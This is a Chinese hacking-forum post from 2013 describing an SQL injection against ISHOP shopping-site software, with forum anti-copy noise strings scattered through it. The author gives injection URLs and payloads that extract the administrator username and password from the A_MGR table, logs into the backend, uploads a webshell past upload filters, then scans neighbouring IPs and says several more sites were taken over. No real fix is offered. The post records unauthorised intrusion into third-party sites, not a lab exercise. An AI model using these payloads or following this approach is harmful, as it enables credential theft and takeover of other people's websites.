找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2106|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
发现一个注入点( ~7 g9 w1 f# y$ V
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
  z/ i& H* u9 X0 D" G3 Q2 G- `9 K1 E, V# {  B7 _  q2 ]9 r: ]
习惯性的加’having1=1--
3 C- E$ U7 T5 G+ M: e5 z
3 n4 a$ s+ X+ l3 dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
/ U8 T& f- Q# K4 J( V$ ~5 E( i% X* y  G; z  c1 }+ v+ p; b/ F* b
03 h3 Y( r9 a, L7 H6 p: X4 h( t3 I
" T2 t% F. z: F9 H. h
爆出Diary_A.dl_Title(这时候很激动啊)
2 X, u) q+ c7 c5 r$ K
  K2 ?. ]9 S- m. h1 L2 q那么继续% j' k# ?# _. U+ z  R" ~4 y
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—  I3 q3 [9 O2 A. b: ?* T" F

" y6 e) K* p0 y6 \继续,一直爆下去
# I4 i  G) X+ A* {, W; T/ r6 v  l- R2 Y; @+ O% T) D: R
爆到几个字段和表段 但是没找到需要的管理用户的字段2 y) J1 ?: U0 ?& `" t, |/ i. F* w
3 X# v, o" p0 e9 Z
蛋疼了 怎么办 然后去后台登陆页看源码9 h5 @6 X  T& U0 \

: p% K( i% W0 f0
9 x' C9 K( p( C/ s0 |' y- f  k' \" G- W9 n0 H8 n6 W$ s1 _
Input name= “ADUID”+ b! m0 w$ x  Z+ ^+ u" @+ E
Input name= “ADPWD”
0 `" @6 S5 R9 O0 z0 ?3 H9 i4 B) F: z! X
很幸运 找到了字段那就继续
5 a; h+ M0 ]! j& i) y找到之后开始爆用户& z$ P5 U) \3 X+ f5 n
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—, s4 ~. F  `0 d. `3 r3 j+ T
爆密码
; [" k4 z3 M* x$ o+ u6 x% ?9 i0 X0 rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
. m9 F. f4 D& d测试了下 这个注入点只能爆到文章哪里的表 2 @0 O, C! k, K
* p: ^) ]$ L7 ]" i' A. G
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了% N& q2 x# u! h( o! U
5 m' F4 d  x7 G1 A9 f0 e
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了- R( o& m1 u4 |+ ]

: g# z, |$ H! t. M8 `9 Z# f473
% ?- R# Y) u$ C5 D% |7 h1 q, S, t
; {6 i4 I1 n+ C' T8 r0 ?6 s进后台
: R1 E& h! t0 P0 U* u9 J$ V+ L+ H: @
1 E6 i* w: i2 g* @* j! b4 G9 J, D
发现几个上传点 有的地方不能上传 而且防止恶意代码  _4 j* {4 J( S' ~; R$ K3 |
) A5 F+ x( o+ n
没办法 各种百度各种找大牛 找到一只好像可以突破的马  p* E: H. q, [( q) B6 w6 A, S8 y

- T$ H" C4 @! `9 L( i) l; }  W' l& u! ?1 h% f
在系统管理那里直接上传 不过没有显示地址
1 e% z; s( L4 b( ^  e9 Z/ s, F9 m
: s$ x6 K  _5 f: W再上传一次 抓包 搞定OK
! q& D* v7 P7 {5 I" J' U  s2 @
- C! y1 s/ h  M) {
+ [: b. m5 }; \7 L8 O  I7 M6 O! X
472! z: H. v" B  Y

" z1 \: F2 e  p1 I% n2 @晚上不行了 去睡觉。。。/ S" o) S1 K$ I  R  p. H; |
第二天刚起床 闲的没事做继续日站吧
+ H- `. r. O, d% k
, _( y) D8 _/ N找个站 就把这个站的旁c扫了下
+ l, y' b3 P" j" t0 b7 k
$ y7 @1 T5 s' z( J发现c段也有一个购物站 ,然后还和这个站的模板差不多
7 T6 N% X: N  g+ k% y4 |9 \6 s: U! T; U! C0 M( M
就找到会员登录口测试8 l% k" J8 K: ?, R1 I

, ^; C3 U8 f' a  O. O) b; _'and (select top 1 MGR_UID from A_MGR)>0—. q# {. F$ ~! b8 ^
果断爆到了 这时候我很激动 通杀& Q0 ]+ J! V4 ^+ r$ a

* x# g6 [- Z- a1 ~/ @再次翻c段  w6 @- A% F: ^7 F" S8 j" c% o; S
' g# m( O) c5 Z# C; U+ E4 d- r
翻出几个站 都成功拿下8 t7 z3 E6 \0 k3 I9 }

  v  H: U. g  l, A( C
+ w2 }. O  c% C, o7 ^* c
" b! G1 E# Q3 d0 T" \1 W4 H7 N5 x修复方案:$ }. I4 ?9 K1 W, v
他们比我专业
4 b# I/ n8 c9 O: X$ c" n6 O8 Z. a$ V
: O* z/ H7 y8 F: j
2 f! O( ^: N6 Z! F' H$ N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表